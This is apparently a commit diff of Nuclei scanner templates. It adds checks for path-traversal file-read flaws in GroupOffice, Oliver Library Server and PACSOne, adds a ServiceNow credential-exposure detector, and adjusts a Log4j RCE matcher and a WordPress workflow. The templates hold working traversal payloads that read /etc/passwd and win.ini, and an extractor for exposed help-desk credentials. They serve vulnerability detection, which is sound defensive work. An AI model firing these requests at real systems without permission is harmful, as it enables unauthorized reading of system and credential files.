reference:
- https://cxsecurity.com/issue/WLB-2018020249
- http://www.group-office.com
tags: groupoffice,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/compress.php?file=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

25
vulnerabilities/other/oliver-library-lfi.yaml Normal file
View File

@ -0,0 +1,25 @@
id: oliver-library-lfi
info:
name: Oliver Library Server v5 - Arbitrary File Download
author: gy741
severity: high
description: An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.
reference:
- https://www.exploit-db.com/exploits/50599
- https://www.softlinkint.com/product/oliver/
tags: windows,lfi,oliver
requests:
- method: GET
path:
- "{{BaseURL}}/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini"
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and

23
vulnerabilities/other/pacsone-server-lfi.yaml Normal file
View File

@ -0,0 +1,23 @@
id: pacsone-server-lfi
info:
name: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal
author: 0x_Akoko
severity: high
reference: https://cxsecurity.com/issue/WLB-2018010303
tags: pacsone,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

32
vulnerabilities/other/servicenow-helpdesk-credential.yaml Normal file
View File

@ -0,0 +1,32 @@
id: servicenow-helpdesk-credential
info:
name: ServiceNow Helpdesk Credential Exposure
author: ok_bye_now
severity: high
description: Detection of exposed credentials in help the help desk JS file.
reference: https://jordanpotti.com/2021/02/21/ServiceNow-HelpTheHelpDeskAndTheHackers/
tags: servicenow,exposure
requests:
- method: GET
path:
- "{{RootURL}}/HelpTheHelpDesk.jsdbx"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- 'var httpPassword = "encrypt:'
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- 'var server = "([a-z:/0-9.-]+)"'

4
vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml
View File

@ -28,11 +28,11 @@ requests:
- type: regex
part: interactsh_request
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output

8
workflows/wordpress-workflow.yaml
View File

@ -6,8 +6,6 @@ info:
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: wordpress
subtemplates:
- tags: wordpress
- template: technologies/wordpress-detect.yaml
subtemplates:
- tags: wordpress